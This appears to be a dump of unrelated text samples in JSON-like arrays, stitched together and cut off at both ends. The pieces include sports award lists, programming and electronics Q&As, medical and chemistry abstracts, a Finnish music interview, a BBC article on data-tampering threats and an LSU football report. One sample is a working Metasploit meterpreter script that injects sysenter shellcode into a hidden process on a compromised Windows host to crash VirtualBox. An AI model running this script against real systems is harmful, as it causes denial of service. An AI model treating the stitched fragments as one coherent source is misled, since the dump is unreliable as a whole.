Jackson-Davis, Indiana\n\nOrion Sang, Detroit Free Press\n\nPlayer of the year: Cassius Winston, Michigan State\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Trayce Jackson-Davis, Indiana\n\nChris Solari, Detroit Free Press\n\nPlayer of the year: Luka Garza, Iowa\n\nCoach of the year: Greg Gard, Wisconsin\n\nFreshman of the year: Trayce Jackson-Davis, Indiana" ]
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[ "##\n# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.", "\n# If you'd like to improve this script, please try to port it as a post\n# module instead. ", "Thank you.", "\n##\n\n\n# Meterpreter script for triggering the VirtualBox DoS published at:\n# http://milw0rm.com/exploits/9323\n\nopts = Rex::Parser::Arguments.new(\n \"-h\" => [ false,\"Help menu.\" ]", "\n)\n\nopts.parse(args) { |opt, idx, val|\n case opt\n when \"-h\"\n print_line(\"virtualbox_sysenter_dos -- trigger the VirtualBox DoS published at http://milw0rm.com/exploits/9323\")\n print_line(\"USAGE: run virtualbox_sysenter_dos\")\n print_status(opts.usage)\n raise Rex::Script::Completed\n end\n}\n\n#check for proper Meterpreter Platform\ndef unsupported\n print_error(\"This version of Meterpreter is not supported with this Script!\")", "\n raise Rex::Script::Completed\nend\nunsupported if client.platform !", "= 'windows'\n\n# Spawn calculator\npid = client.sys.process.execute(\"calc.exe\", nil, {'Hidden' => 'true'}).pid\nprint_status(\"Calculator PID is #{pid}\")\n\ncalc = client.sys.process.open(pid, PROCESS_ALL_ACCESS)\n\n# Allocate some memory\nmem = calc.memory.allocate(32)\n\nprint_status(\"Allocated memory at address #{\"0x%.8x\" % mem}\")\n\n# Write the trigger shellcode\n# sysenter\n# ret\ncalc.memory.write(mem, \"\\x0f\\x34\\xc3\")\n\nprint_status(\"VirtualBox SYSENTER Denial of Service launching...\")\n\n# Create a new thread on the shellcode pointer\ncalc.thread.create(mem, 0)\n\nprint_status(\"VirtualBox SYSENTER Denial of Service delivered.\")", "\n\n" ]
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[ "Q:\n\nHow do filament LED bulbs work, looking very similar to incandescent bulbs?", "\n\nFilament LED bulbs use very narrow strips containing the LED,\nwhich look similar to filaments of an old incandescent bulb:\nThey look like a normal bulb with large \"old-style\" coal filaments, and are of about the same size and shape as the common standart E27 socket bulb.", "\n\nThere are two basic variants of these bulbs: \n\nOne \"plain\" as described, looking impressively similar to a classic bulb\nThe other has a white coating on the glass, about 15mm wide next to the metal socket.", "\n\nHow are these filaments build?", "\nI could imagine the it's \"pretty normal\" LEDs, but lots of them,\ndirectly bonded to something? (", "There are references to COB)\nHow does the heat management work?", "\nIi have seen speculations about filling the bulb with either helium\nor \"some patented organic gas\" -\ncould that be enough for cooling?", "\nHow does the driver - which seems to be very small - work?", "\nIn the variant with white coating - hiding some components, I assume - is already not that much space, and in the plain variant, there seems to be almost no space for something nontrivial.", "\nBelow you see some bulbs of the white coating variant, switched on:\n\n(Images with the permission of this supplier at Alibaba)\n\nNote how the LED filament bulbs are not so much similar to the tungsten filament bulbs recently being phased out - they are more resembling the long outdated carbon filament bulbs:\n\nbd® Antike Edison 220V-240V 40W Retro Vintage Industry Style Deko Glühbirne (kl)\n\nA:\n\nThese LEDs are not a single radial die, they are made with a transparent substrate with many LED dies in series (probably 25) placed on it. ", "The whole thing is then coated in phosphor. ", "The light isn't completely uniform but it's good enough.", "\n\nThere's a spec sheet here: http://www.runlite.cn/en/product-detail-145.html\n\nA:\n\nI purchased one of these lamps in Italy: 3W/300lumens/9,00euros\nI took some pictures with very low exposition to higlights multiple \"dot leds\":\n\nI can count 28 dot-leds per each strip and 4 strips. ", "This gives 112 dot-leds.", "\nOther numbers:\n100 lumen/watt\n2.68 lumen/dotled\n75 lumen/strip\n0,03 euro/lumen\nAssuming half the cost is for the electronics, we could assume, for easier calculations, 4,00 euros per 4 filaments, hence 1 euro per 28-dots/75-lumen strip.", "\n\nA:\n\nTo understand how these devices function, it helps to understand how traditional LEDs function. ", "An LED is a Light Emitting Diode, so basically you can think of it as a simple PN junction that would be used in a diode (although in actuality the structure of LEDs is more complicated, often a double heterojunction structure).", "\n\n(source: gsu.edu)\nBased on images of a similar LED \"filament\" bulb on Amazon image1, image2\n\nIt seems that each \"filament\" is a single LED with a radial structure, that is using radial layers rather than the traditional planar layers. ", "So the core layer (cathode for example) would be composed of a conductor/metal, then the next outer layer would be n-type material, then the next outer layer would be p-type material, and finally the outermost layer would be a transparent conductor (to let light pass through it) such as ITO (Indium-Tin-Oxide).", "\nIt looks as though the LEDs in the bulb are arranged as two lines in parallel, each with two LEDs in series.", "\nThe driver would depend on the specs of the particular LED \"filaments\", but a driver could be as simple as diode bridge if the LEDs have a high enough forward voltage.", "\nBecause these LED \"filaments\" are so long and thin, they have a large amount of surface-area per volume, so that the heat is more dissipated than in a traditional LED.", "\n\n" ]
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[ "Q:\n\nRest API call from apex Controller\n\nI want to call a url using Rest API from my apex controller and show the response from that url to my visualforce page. ", "I have written a code. ", "But it is not working.", "\nController\npublic class RestApi_Controller{\n public HTTPResponse res{get; set;}\n public String resBody{get; set;}\n public String endpoint{get; set;}\n\n @future(callout=true)\n public static void submit(){\n HttpRequest req = new HttpRequest();\n req.setMethod('GET'); \n //Seting HttpRequest Method\n req.setHeader('content-type', 'application/json'); \n //Seting HttpRequest header properties\n req.setHeader('Content-Length', '2000');\n req.setEndpoint('https://cosprdapi.cadence.com/cdpaccess/Ldap_FolderUpload/CreateSearchUserServlet?uid=******&pwd=*****' );\n Http http = new Http();\n try{\n HTTPResponse res = http.send(req); \n //Executing web service call\n System.debug('STATUS:' + res.getStatus());\n System.debug('STATUS_CODE:' + res.getStatusCode());\n }\n catch(System.", "CalloutException e){ {\n //Exception handling goes here..\n system.debug(e);\n }\n }\n}\n\nHere is my vf page:\n\nA:\n\nYou are sending some extra parameters I remove them and got 200 status.", "\nHttpRequest req = new HttpRequest();\nreq.setMethod('GET'); \n//you don't need this \n//Seting HttpRequest Method\n//req.setHeader('content-type', 'application/json'); \n//Seting HttpRequest header properties\n//req.setHeader('Content-Length', '2000');\nreq.setEndpoint('https://cosprdapi.cadence.com/cdpaccess/Ldap_FolderUpload/CreateSearchUserServlet?uid=*****&pwd=******' );\nHttp http = new Http();\ntry{\n HTTPResponse res = http.send(req); \n //Executing web service call\n System.debug('STATUS:' + res.getStatus());\n System.debug('STATUS_CODE:' + res.getStatusCode());\n}\ncatch(System.", "CalloutException e){\n //Exception handling goes here..\n system.debug(e);\n}\n\nHere are the success status\n\nNote: Also NEVER share your account credentials in public site. ", "I\n hope they are test credentials.", "\n\n" ]
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[ "Q&A Forum\n\nCash or Accrual Tax Return?", "\n\nWhat are the pros and cons of changing a tax return basis from Cash to Accrual for an LLC?", "\n\nAnswers\n\nAnonymous\n\n(Controller)\n| Feb 3, 2016\n\nRevenue timing for a growing company. ", "For years when we were experiencing rapid growth we were taxed on less income than what our financials reported since the income always was going up but we often didn't receive payment until after January 1st. ", "We had a favorable book-to-tax adjustment. ", "However, if you are shrinking, the reverse can happen.", "\n\nBusiness Exchange\n\nContribute to Community\n\nIf you’re interested in learning more about contributing to your Proformative community, we have many ways for you to get involved. ", "Please email [email protected] to learn more about becoming a speaker or contributing to the blogs/Q&A Forum." ]
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[ 0.02631578947368421, 0.010869565217391304, 0.011363636363636364, 0, 0, 0, 0, 0.017241379310344827 ]
[ "Fluorescent paste has been widely used to manufacture fluorescent films for use in display apparatuses, such as cathode-ray tubes (CRTs) and plasma display panels (PDPs), illuminators, such as fluorescent lamps, X-ray intensifying screens, and luminous substances.", "\nConventional fluorescent paste contains fluorescent fine particles, a solvent, and a binder resin. ", "Fluorescent paste is applied on a substrate to form a coating and is dried or subjected to additional heat treatment to decompose a binder resin and sinter fluorescent fine particles (see, for example, Patent Document 1) or cure the binder resin (see, for example, Patent Document 2), thus forming a fluorescent film.", "\n[Patent Document 1] Japanese Unexamined Patent Application Publication No. ", "2001-226669.", "\n[Patent Document 2] U.S. Patent Application Publication No. ", "2003/0099859.", "\nHowever, as in a light-emitting diode described in Patent Document 2, the remaining binder resin in a fluorescent film reduces the content rate of a fluorescent substance in the fluorescent film, thus lowering the luminous efficiency.", "\nFurthermore, as in a fluorescent film described in Patent Document 1, when the thermal decomposition of a binder resin and the sintering of fluorescent fine particles are performed after the formation of a coating, although the content rate of a fluorescent substance in the fluorescent film can be high, there are some problems, such as low manufacturing efficiency, poor adhesiveness of the fluorescent film to a substrate, and unavailability of plastics as substrates." ]
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[ "Conformationally constrained, stable, triplet ground state (S = 1) nitroxide diradicals. ", "Antiferromagnetic chains of S = 1 diradicals.", "\nNitroxide diradicals, in which nitroxides are annelated to m-phenylene forming tricyclic benzobisoxazine-like structures, have been synthesized and characterized by X-ray crystallography, magnetic resonance (EPR and 1H NMR) spectroscopy, as well as magnetic studies in solution and in solid state. ", "For the octamethyl derivative of benzobisoxazine nitroxide diradical, the conformationally constrained nitroxide moieties are coplanar with the m-phenylene, leading to large values of 2J (2J/k > 200 K in solution and 2J/k >> 300 K in the solid state). ", "For the diradical, in which all ortho and para positions of the m-phenylene are sterically shielded, distortion of the nitroxide moieties from coplanarity is moderate, such that the singlet-triplet gaps remain large in both solution (2J/k > 200 K) and the solid state (2J/k approximately 400-800 K), though an onset of thermal depopulation of the triplet ground state is detectable near room temperature. ", "These diradicals have robust triplet ground states with strong ferromagnetic coupling and good stability at ambient conditions. ", "Magnetic behavior of the nitroxide diradicals at low temperature is best fit to the model of one-dimensional S = 1 Heisenberg chains with intrachain antiferromagnetic coupling. ", "The antiferromagnetic coupling between the S = 1 diradicals may be associated with the methyl nitroxide C-H- - -O contacts, including nonclassical hydrogen bonds. ", "These unprecedented organic S = 1 antiferromagnetic chains are highly isotropic, compared to those of the extensively studied Ni(II)-based chains." ]
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[ "The team competes in the Formula Student , which is Europe's most established educational engineering competition and aims to develop enterprising and innovative young engineers and encourage more young people to take up a career in engineering. ", "The format of the event is such that it provides an ideal opportunity for the students to test, demonstrate and improve their capabilities to deliver a complex and integrated product in the demanding environment of a motorsport competition." ]
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[ "Q:\n\nWPF Listbox multi selection working like windows files select\n\nIs it possible in a WPF ListBox with selection mode \"Multiple\" working like windows files folder. ", "If one row of the Listbox is selected if I click on another row it automatically deselect the previous one. ", " Also if the ctrl key is pressed it allows me to select multiple rows and same with the shift key, just simulating the windows files folder.", "\nWhat are the events and properties are required for this? ", " Any code shared will do wonder.", "\n\nA:\n\nChange ListBox.", "SelectionMode = SelectionMode.", "Extended. ", "It will allow you to select multiple items using Shift and Ctrl key.", "\nMSDN reference\nhttp://msdn.microsoft.com/en-us/library/system.windows.controls.selectionmode.aspx\n\n" ]
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[ "Reye's syndrome. ", "A diagnosis occasionally first made at medicolegal autopsy.", "\nReye's syndrome, a condition characterized pathologically by cerebral edema and fatty change of the liver, has been described extensively in the medical literature as a disease manifested clinically by encephalopathy and coma. ", "This is a report of five cases of Reye's syndrome occurring as sudden, unexpected deaths outside of the hospital. ", "In each of these cases, there is a vague history of a previous viral illness. ", "A history of aspirin intake is inconstant. ", "Each child either had no significant past illnesses or there was a history of repeated upper respiratory infections. ", "The classic progression of signs and symptoms usually described for Reye's syndrome, where vomiting usually precedes encephalopathy and coma, was not present in any of the cases. ", "Results of autopsies showed the characteristic findings for Reye's syndrome, and additional tests showed no other explanation for the deaths. ", "This manifestation of the disease is seldom described in medical literature, but it may be encountered occasionally by the medical examiner." ]
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[ "Guttate psoriasis following Kawasaki disease.", "\nGuttate psoriasis developed in a 3.5-year-old boy during the course of Kawasaki disease (KD). ", "The pathogenesis of this unusual complication may be production of superantigens, which is also considered to be a cause of KD." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0, 0, 0 ]
[ "Paavoharju on kummallinen yhtye. ", "Kokoonpano on Suomessa ja kotikaupungissaan Savonlinnassa melko marginaalinen tapaus, mutta toisaalta yhtyeen musiikkia on kehuttu musiikkimedioissa ympäri maailman ja se on konsertoinut aina Roskildessä saakka. ", "Yhtye on myös alati muistanut nostaa esille synnyinkaupunkiaan – tosin ei kenties aina siinä valossa kuin Oopperajuhlista tuttu paikkakunta haluaisi.", "\n\nPaavoharjun keskiössä ovat Ainalan veljekset Lauri ja Olli, ja heistä ensin mainittu on kirjoittanut kirjan muusikoiden taipaleesta pienessä Etelä-Savon kaupungissa. ", "Tuote kertoo vuosista, jolloin Paavoharju ja Joose Keskitalo vielä aloittelivat musisointiaan. ", "Tiedotteen mukaan ”kirja piirtää kuvan pikkukaupungin konservatiivisuudesta, vaihtoehtojen vähyydestä ja mitääntapahtumattomuudesta. ", "Keskiöön nousee Tuote, vanha toimintansa lopettanut osuusmeijeri, jonka nuoret ottavat haltuunsa – tai enemminkin Tuote ottaa heidät haltuunsa”.", "\n\n”Charles Bukowski on Tuotteen stoorin rinnalla keskiluokkaista dokailua. ", "Lähempänä on William Burroughs, mutta heroiinin tilalla on kilju, tuo Tuotteen harmaa liemi. ", "Stoorin kiljuburroughs on jatkuvaa ulostamista ja oksentamista, jossa paskaa tulee joka reiästä. ", "Vanhasta on päästävä eroon, että uutta voisi syntyä: uusi kulttuuri syntyy edellisen raunioille”, tiedotteessa runoillaan.", "\n\nKirjan lisäksi julkaistaan Tuote-albumi, jolla on mukana kirjan käsittelemien vuosien aikaista musiikkia. ", "Tämä albumi tulee nyt ennakkokuunteluun Soundin sivuilla, ja lisäksi Lauri Ainala kertoo sähköpostihaastattelussa hieman teoksensa taustoista. ", "Tarkasta levy ja haastattelu alempaa. ", "Kirja ja albumi tulevat myyntiin huomenna 4. ", "toukokuuta, ja Joose Keskitalo, Paavoharju ja Trees esiintyvät julkaisukeikalla 9. ", "toukokuuta Helsingin Korjaamon Vaunusalissa.", "\n\nTuote-kirjaa on kirjoitettu tiedotteen mukaan jopa kymmenen vuoden ajan. ", "Miltä tuntuu saada pitkä projekti päätökseen? ", "Miten kuvailisit pitkää matkaa teoksen kimpussa?", "\n\n”12 vuotta sitten aloitimme rustaamisen. ", "Projekti oli hyvä saada päätökseen, koska muuten tekisin sitä edelleen – ehkä jopa seuraavat 12 vuotta. ", "Tekeminen on ollut välillä intensiivistä ja välillä taas homma ei ole edennyt ollenkaan. ", "Suurin rupeama oli 2012–13 paikkeilla, jolloin kirjoitimme paljon ja Ville Tarke teki suuren urakan kirjan kuvittamisessa. ", "Hän teki yli 100 kuvaa kirjaa varten, joista mukaan valikoitui lopulta parisenkymmentä parasta.”", "\n\nIlmeisesti Tuote kertoo paljon Savonlinnan nurkkakuntaisuudesta. ", "Tämä on ulkopuoliselle sikäli yllättävää, että kaupungilla on maine musiikille ja taiteille otollisena paikkakuntana. ", "Onko kaupungin musiikki-imago vääristynyt?", "\n\n”Meitä ei ole hirveesti kiinnostanut kaupungin suhde taiteeseen tai musiikkiin, koska olemme tehneet aina omaa täysin riippumatonta juttua. ", "Joskus olemme hakeneet jotain kaupungin apurahoja, koska kuulimme luotettavalta taholta että niin voi tehdä. ", "Rahat käytimme oikeamielisesti – esimerkiksi väestönsuojaluolan vuokraamiseen. ", "Luolaan teimme murjun autiotalon ovista. ", "Siellä sitten asusteltiin, ryypättiin ja pelattiin Playstationilla Tekken ballia. ", "Nykyään tilanne on toki toisenlainen.", "\n\nKaupungin musiikki-imago on vääristynyt. ", "Musiikki-imagon korjaamiseksi Soundi voisi tehdä viiden aukeaman jutun Savonlinnan musiikin todellisista messiaista. ", "Jos näin ei tapahdu imago senkun jatkaa vääristymistään!”", "\n\nTuote-kollektiivin mainitaan suosineen kiljua inspiraation lähteenä. ", "Mikä ainesosa on asianmukaisen ja nautittavan kiljun salaisuus?", "\n\n”Tämä ei ole salaisuus: turbohiiva ja tarpeeksi sokeria, että tulee nopeasti riittävä määrä alkoholia. ", "Jos ei juominen maita niin suppilo on hyvä nautiskelun apuväline. ", "Suppilon kanssa kannattaa olla varovainen!”", "\n\nMikä yksittäinen tapahtuma Tuotteen ja Paavoharjun historiassa nousee ensimmäisenä mieleen sellaiseksi käänteentekeväksi hetkeksi, jonka myötä underground-liikkeenne alkoi kukoistaa toden teolla?", "\n\n”Hirttäytyneen miehen löytäminen Tuotteelta. ", "Hänen uhrinsa ansiosta saimme oman Tuote-kodon. ", "Kyseisestä asiasta voitte lukea Tuote-kirjasta, rakkaat ystävät ja viholliset.”", "\n\nOnko Savonlinna kaikkine vikoineenkin nyt sellainen kuin sen pitääkin olla, vai toivoisitteko kaupungin ilmapiirin muuttuvan johonkin suuntaan uusien sukupolvien myötä?", "\n\n”Ei ole, vaikkakin Savonlinna on edelleen ainoa Pyhä kaupunki. ", "Uudet rakennushirvitykset pitäisi purkaa ja niiden tilalle pitäisi rakentaa jotain hienoa, tai sitten jättää ne alueet puistoiksi. ", "Maanpettureiden perseille pitäis riputella risulla ja lisäks heidän tulisi pyytää anteeksi koko kansalta. ", "Uusille sukupolville suosittelen Savonlinnan palvojien henkistä perintöä, eli Paavoharjun, Harmaan Geton ja Joosen levyjä, Unien Savonlinna -leffaa sekä Tuote-kirjaa. ", "Niistä voi oppia, millaista on funhurskas elämä Savonlinnassa.”", "\n\nMillainen Savonlinnan underground-tilanne on nykypäivänä?", "\n\n”Todella hyvä, koska Savonlinnan palvojien organisaatio on siitä huolehtimassa. ", "Esimerkiksi uusi päämaja on rakenteilla, kuten myös uusi saunakin. ", "Musiikkiin liittyen taasen huomauttaisin, että Ainalat ja Keskitalot asuvat Savonlinnassa, kuten myös Säästöpoikien pääpirut. ", "Lisäksi nousevia nimiä ovat Trees, Revon akan poika ja Rivo naakanpoika.", "\n\nAloitimme vuonna 2017 Ville Löppösen, Joose Keskitalon ja Veera Kolehmaisen kanssa poikkitaiteellisen projektin nimeltään Savonlinnan uusi taidemuseo. ", "Nimi on suora kannanotto kulttuuri- ja taide-elämän alasajoon. ", "Haluamme näyttää, että pieni, itsenäinen taho pystyy järjestämään laadukasta ja kiinnostavaa, valtavirrasta poikkeavaa kulttuuritarjontaa. ", "Tapahtumat järjestetään tyhjilleen jääneissä rakennuksissa, joita Savonlinna on pullollaan – 2017 syyskuussa tapahtui Savonlinnan vanhassa kirjastossa ja nyt 2018 heinäkuussa siirrymme viimeksi kirpputorikäytössä olleeseen halliin Savolaan. ", "Tämänvuotista aavekaupunkiteemaista näyttelyä on kanssani kuratoimassa vaimoni, taidemaalari Emma Ainala. ", "Musiikillisen puolen kuratoinnista vastaan yhdessä Joose Keskitalon kanssa. ", "Tapahtuma on kaikille avoin ja ilmainen! ", "Lisää tietoa lojuu projektin FB-sivulla!”" ]
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[ "Management of ureteropelvic obstruction in the first year of life.", "\nFrom July 1971 until December 1978 we treated 19 male and 5 female children less than 1 year old for ureteropelvic junction obstruction. ", "Diagnosis was based on high dose excretory urography with delayed films. ", "Ultrasound was performed in some cases to confirm hydronephrosis. ", "Cystoscopy and retrograde pyelography were not required. ", "Of 32 obstructed kidneys 27 were repaired by dismembered reduction pyeloureteroplasty. ", "Of 8 patients with bilateral involvement 3 underwent unilateral repair only because of lesser contralateral obstruction and 1 underwent unilateral nephrectomy. ", "Of the 27 repairs 20 were protected by nephrostomy or pyelostomy drainage plus a small caliber silicone rubber or polyvinyl stent. ", "Of the 6 non-stented repairs 2 had delayed opening of the repair. ", "A frozen section renal biopsy aided in a decision to repair the kidney in 4 of 6 instances and in 10 other instances a renal biopsy was obtained for prognostic purposes. ", "There were no secondary nephrectomies, although 2 boys required reoperations for a successful result. ", "Instillation pyelography with fluoroscopic monitoring was used to determine when the tubes could be removed. ", "Generally, we removed the stent 4 or 5 days postoperatively and the nephrostomy at a variable time after demonstration of patency of repair. ", "In this group of small children pyelostomy or nephrostomy and intubation of the repair are useful additions to the surgical technique to prevent obstruction of the tiny and delicate infant ureter by anastomotic edema or kinking of the repair." ]
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[ "Image copyright Getty Images Image caption Attacks on data integrity could target farming data to wreck years of crops\n\nThere's a new cyber threat on the horizon. ", "And it's fiendishly subtle and potentially very dangerous.", "\n\nFake data - altering databases and documents without anyone noticing.", "\n\nSay you changed centrally held figures for a key metric such as soil fertility that many arable farmers use to organise their planting schedules.", "\n\n\"That data is used to drive another process, and lots of decisions are made on that basis,\" says Jason Hart from security firm Gemalto.", "\n\nUnless the attack was noticed quickly, he says, it could have devastating consequences because the sabotaged data would kick off actions that played out over months and years.", "\n\nYou could end up with failed crops, food shortages and, in a worst case scenario, famine.", "\n\n\"You have no way of going back once a decision is made and the impact has happened,\" says Mr Hart. \"", "There's a real amplifier effect to that kind of problem.\"", "\n\nImage copyright Getty Images Image caption Could hackers interfere with automated stock trading and cause another crash?", "\n\nOther scenarios include hackers interfering with automated stock market trading, triggering mass sell-offs and economic instability.", "\n\nOr \"poisoning\" supply chain data so that the wrong stuff goes to the wrong stores, not to mention the potential dangers to energy supplies if production forecasts are tampered with.", "\n\nCircle of trust\n\nMany of the decisions we make in business and government are based on data that we assume is accurate. ", "So if you undermine the authenticity of that data - and our trust in it - you can potentially bring an economy to its knees, experts warn.", "\n\nBusinesses are vulnerable to this type of cyber sabotage because they inherently trust the data and documents they produce, says Abe Smith of Dealflo, a company that helps financial firms automate transactions.", "\n\nImage copyright Getty Images Image caption Could data hacking prove as damaging to our energy networks as storms?", "\n\n\"There's about $15 trillion [£12tn] of financial agreements processed every year and most of them are manual in one sense or other,\" says Mr Smith.", "\n\nAutomation helped to cut costs involved with those financial agreements and to weed out mistakes, but these changes only reinforced reliance on digital information.", "\n\nAnd anything digital can be tampered with.", "\n\nDocuments that teams have been collaborating on are vulnerable to attackers that can change the core text, alter numbers, or re-write terms and conditions to one party's benefit, says John Safa of Pushfor, a company that makes secure ways for firms to share data and other content.", "\n\n\"At the end of the day it can be edited and it can be changed,\" he says. \"", "The problem then is if it is a legal contract without enough back-up, then it could be represented as something factual.\"", "\n\nImage copyright Eyewire Image caption Many documents still require a \"wet ink\" signature to seal a deal\n\nIt is still all too easy to drill down into a document's metadata and change its basic properties that, if examined, lend weight to the fiction of it being authentic.", "\n\n\"Whatever emerges at the other end of a workflow system people will accept,\" he says. \"", "The document preserves the memory and we believe what it says all the time.", "\n\n\"Trust in all of this process is critical,\" he says. \"", "If that trust is lost then the entire process breaks down.\"", "\n\nLocked down\n\nBut there are technical ways to lock down data and documents to thwart the efforts of stealthy attackers to read or change them.", "\n\nMany firms now use Digital Rights Management (DRM) systems to police who can do what to reports, files and other documents floating around their organisations, says Stuart Barr, chief strategy officer at workflow system firm HighQ.\n\nDRM has been used to stop pirates stealing copies of copyright movies and video games, he says, but is now regularly applied to documents. ", "It restricts editing to a select few and resists other attempts to make changes.", "\n\nImage copyright Thinkstock Image caption Some firms use digital padlocks to restrict who can edit key documents and data\n\n\"You should not be able to fiddle with them,\" he says.", "\n\nIt's one of the reasons why blockchain technology is gaining momentum as a way to authenticate contracts and transactions.", "\n\nMr Barr says firms using DRM have to strike a balance between putting good protections around valuable documents, and not making them so onerous that people avoid them.", "\n\n\"You would be surprised how many people let documents run around in the wild without any protection,\" he tells the BBC, adding that a lot of organisations are \"porous\", letting key files flow back and forth with few checks on what has happened to them in the meantime.", "\n\nSome firms seek to filter this flow using specialist cloud-based services, but, says Mr Barr, work has to be done to ensure that this innovation does not introduce more risk.", "\n\n\"If they have files that are stored in any reputable cloud they should be encrypted at rest and in transit,\" he says.", "\n\nScrambling data, allied to techniques that generate unique identifiers for important files, could go a long way towards preventing attacks on data integrity, he says.", "\n\n\"There's a growing awareness that this is an issue that has to be taken seriously.\"", "\n\nError correction\n\nCloud-based management systems that use encryption to protect important documents are still very new in the legal world, says Susan Hall, a partner at law firm Clarke Willmott.", "\n\nA lot of law firms still rely on Redline editing, she says, which uses the edit tracking systems built in to Microsoft Word.", "\n\nImage caption Many law firms still rely on older technology to manage edits and merge changes\n\nThis allows edits to be made and marked on versions of contracts and other documents as negotiations or talks progress, she says.", "\n\n\"Often you have junior staff go through the final version to make sure nothing has crept in inadvertently or has otherwise changed before the signature,\" she says.", "\n\n\"But in a lot of these situations you are operating under extreme pressure and there's a high risk that people won't pick up that something should have been included but wasn't.\"", "\n\nIn highly complex business contracts, a surreptitiously included clause could end up losing your business millions.", "\n\nSo it's not just cyber theft we need to worry about, it's data integrity.", "\n\nFollow Technology of Business editor Matthew Wall on Twitter and Facebook\n\nClick here for more Technology of Business features" ]
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[ "RCU\n\nRCU may refer to:\n\nScience and technology\n Read-copy-update, a computer operating system synchronization mechanism\n Remote concentrator unit in telephony\n Organocopper complexes (RCu), in reactions of organocopper reagents\n\nOrganizations\n Radio Club Uruguayo\n Rogue Credit Union, a federal credit union in Medford, Oregon\n Royal College Union, the alumni association of Royal College Colombo, Sri Lanka\n Regional Cadet Units of the Australian Army Cadets\n Regional Coordinating Unit in the Northwest Pacific Action Plan\n Regional Crime Unit of the Hong Kong Police Force\n\nOther uses\n Rocket City United, an American soccer team\n RC Unterföhring, a German rugby union club\n Las Higueras Airport (IATA code), Argentina\n a minecraft series" ]
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[ "Q:\n\nRemove ios, windows8, and wp8 from Xamarin Forms PCL - nuget 3.0 opt-into error?", "\n\nI'm working on a Xamarin Forms project. ", " I want to target Android and Windows 10 UWP. ", " \nWhen I try to clean up the PCL by removing \"Windows 8\", \"Windows Phone Silverlight 8\", \"Windows Phone 8.1\", \"Xamarin.ios\", and \"Xamarin.ios (classic)\" from the PCL targets, I get the following nasty...\nI'm really just trying to remove WP8 as I don't care about targeting it.", "\n\nThe project's targets cannot be changed. ", " The selected targets require\n the project to opt-into NuGet 3.0 support, however, Visual Studio\n cannot automatically do this for you. ", " Please uninstall all NuGet\n packages and try again.", "\n\nHow do you get a project to opt-into NuGet 3.0? ", "\nSomething else I should try?", "\nenviron: Xamarin Forms, VS2015\n\nThanks....\n\nA:\n\nThe solution that worked for me:\nUninstall Xamarin.", "Forms:\nRight Click Solution -> Manage NuGet Packages -> Uninstall Xamarin.", "Forms -> Restart VS\n\nThen remove build platforms:\nRight Click Solution -> Properties -> Build -> under Targeting select Change -> Remove platform(s) -> Restart VS\n\nReinstall Xamarin.", "Forms:\nManage NuGet packages -> Search for Xamarin.", "Forms -> Install -> Restart VS\n\nA:\n\nAnother possible solution is to rename packages.config temporarily, change the PCL settings to the new target platforms, and then change the name of packages.config back again. ", "This worked for me on my project using VS 2015. ", "Can't take credit for this solution, read it on a blog some time back and just posting it here in case it helps someone. ", "If I come across the blog article again I'll post the link here.", "\n\nA:\n\nFor me this is what fixed it:\nLook into packages.config file in that target project, and uninstall ALL installed packages. ", "Then you'll be able to change the Targeting. ", "Then re-install your packages.", "\n\n" ]
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[ "BATON ROUGE – Starting quarterback jobs for LSU coach Les Miles cannot be won in practice. ", "The heat of the game will decide if sophomore Anthony Jennings or freshman Brandon Harris is LSU’s next full-time starter.", "\n\n“It’s going to be the time in the game where you have the opportunity to extend the play and make a play,” Miles said Sunday afternoon after welcoming 103 players for the start of practice Monday for the 2014 season. “", "And therein, self-interpretation at some point in time will be, in my opinion, by which you pick the starter.”", "\n\nThe starter for the opener on Aug. 29 against Wisconsin in Houston may or may not be the starter for the rest of the season.", "\n\n“I think maturity is the whole deal,” Miles said. “", "I think recognizing the style of throw and the kind of play and seeing them understand what we’re trying to get accomplished, how we’re attacking defense. ", "That’s something that I think both guys have a good solid base premise.”", "\n\nJennings performed greatly at the most crucial of times last season late in the Arkansas game when he came in for injured starter Zach Mettenberger, who is now with the Tennessee Titans of the NFL. ", "Jennings threw a 49-yard touchdown pass with 1:15 to go to beat Arkansas 31-27 and finished 4-of-7 for 76 yards with 26 yards on three carries. ", "He did not play well in either the Outback Bowl win over Iowa or in the spring game, though.", "\n\nHarris looked spectacular in spots in the spring game as he threw three touchdown passes and scrambled for 77 yards, though his overall numbers were not great.", "\n\nUnlike many coaches, Miles does not plan to name a firm starter a week or so before the first game.", "\n\n“Never,” he said. “", "Never have. ", "Never will. ", "We’ll have to see each day how things go — how they proceed.”", "\n\nThere have been times when Miles has simply not publicly named a starter at all. ", "Jennings and Harris will be mixed and matched with the separate varsity and freshman practices over the first week of workouts.", "\n\n“One day, one quarterback will be with the morning group, and the next day he’ll work with the afternoon group,” Miles said. “", "We’ll go back and forth.”", "\n\nJALEN MILLS UPDATE: Junior cornerback/safety Jalen Mills remains indefinitely suspended after his arrest in June for felony battery of a woman, and he was not listed on LSU’s roster Sunday.", "\n\nMiles adjusted his stance on Mills, who started at cornerback in 2012 and ’13 before being moved to safety last spring.", "\n\n“I’m told everything’s pretty positive,” Miles said at the Baton Rouge Rotary Club last week. “", "It’s a very unfortunate situation. ", "Somebody came to his apartment and pursued him. ", "It’s unfortunate on both ends.”", "\n\nOn Sunday, Miles did not offer such specifics and distanced himself from Mills’ legal situation.", "\n\n“And J. Mills (did not report), and again, I don’t know what’s going on there,” Miles said during his opening statement. “", "So I’ll just go forward.”", "\n\nWhen asked about the status of Mills’ legal case, Miles said, “I really don’t know. ", "I have not tried to, nor do I intend to pressure the process in any way. ", "Jalen Mills, as does everybody in this room (players’ meeting room), has a responsibility to handle his business. ", "And this is his business.”", "\n\nEast Baton Rouge Parish District Attorney Hillar Moore said recently that his office was “still investigating” Mills’ charges.", "\n\nVALENTINE DOES NOT REPORT: Other than Mills, the only other player not reporting for practice, according to Miles, was 2014 signee Travonte Valentine, the No. ", "3 ranked high school defensive tackle in the nation out of Champagnat Catholic High in Hialeah, Fla. Valentine’s grades at Champagnat are still under review by the NCAA Clearinghouse.", "\n\n“I know that the communication’s been regular,” Miles said. “", "I think the reality is it’s the high school and the Clearinghouse have to communicate. ", "They’re doing that. ", "They’re trying. ", "Sometimes there are easy answers, and sometimes there are not. ", "Hopefully, this will be an easy answer.”", "\n\nLEALAIMATAFAO NOT ON ROSTER: The name of true freshman Trey Lealaimatafao, a 2014 signee from San Antonio, Texas, did not appear on the roster given to reporters on Sunday. ", "Lealaimatafao was recently arrested on a misdemeanor theft charge for 